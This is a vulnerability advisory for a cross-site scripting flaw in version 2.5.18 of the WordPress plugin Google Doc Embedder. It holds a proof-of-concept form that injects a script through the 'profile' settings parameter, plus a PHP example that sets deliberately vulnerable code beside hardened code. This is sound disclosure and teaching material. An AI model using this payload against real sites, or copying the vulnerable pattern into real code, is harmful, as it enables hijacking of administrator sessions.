Title: WordPress 'Google Doc Embedder' plugin - XSS
Version: 2.5.18
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/google-document-embedder/
Contacted WordPress: 2015/01/26
==========================================================

## Description:
==========================================================
Lets you embed PDF, MS Office, and many other file types in a web page using the free Google Docs Viewer (no Flash or PDF browser plug-ins required).

## XSS:
==========================================================
By tricking a logged-in admin into visiting a crafted page, it is possible to perform an XSS attack through the 'profile' parameter.

PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=gde-settings">
<text>action: </text>
<input type="text" name="action" value="edit" READONLY><br />
<text>profile: </text>
<input type="text" name="profile" value="&quot;><script>alert(1);</script>"><br />
<input type="submit">
</form>

## Solution
==========================================================
Update to version 2.5.19.
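
The PoC depends on two things: the settings page accepts the POST from a form hosted on another site, and the 'profile' value reaches the page unescaped. The sketch below is an added example showing that pattern next to a hardened one using standard WordPress functions. It is not the plugin's code or the 2.5.19 patch; the function names, nonce action and nonce field name are hypothetical, and it assumes it runs inside wp-admin.

```php
<?php
// Added example: hypothetical settings-page code, not taken from the plugin.

// Vulnerable pattern: no capability or nonce check, and the POSTed value is
// concatenated into an attribute, so a quote in 'profile' ends the attribute
// and whatever follows is parsed as markup.
function example_profile_field_vulnerable() {
    $profile = isset( $_POST['profile'] ) ? $_POST['profile'] : '';
    echo '<input type="text" name="profile" value="' . $profile . '">';
}

// Hardened pattern: authorize, require a nonce, sanitize on input, escape on output.
function example_profile_field_hardened() {
    // Only administrators may use the settings page.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    $profile = '';
    if ( isset( $_POST['action'], $_POST['profile'] ) && 'edit' === $_POST['action'] ) {
        // Stops the request unless it carries a valid nonce for this action.
        // A form on another origin cannot know the nonce, so the cross-site
        // submission is rejected before the parameter is used.
        check_admin_referer( 'example_edit_profile', 'example_nonce' );

        // WordPress adds slashes to $_POST; remove them, then strip tags and
        // control characters from the value.
        $profile = sanitize_text_field( wp_unslash( $_POST['profile'] ) );
    }

    echo '<form method="post">';
    // Emits the hidden nonce field that check_admin_referer() verifies.
    wp_nonce_field( 'example_edit_profile', 'example_nonce' );
    echo '<input type="hidden" name="action" value="edit">';
    // esc_attr() encodes quotes and angle brackets, so the value stays
    // inside the attribute even if sanitization missed something.
    echo '<input type="text" name="profile" value="' . esc_attr( $profile ) . '">';
    echo '<input type="submit">';
    echo '</form>';
}
```

Either control alone leaves a gap: the nonce blocks the cross-site trigger but not an injected value arriving another way, and escaping blocks the script but still lets a third-party page change settings.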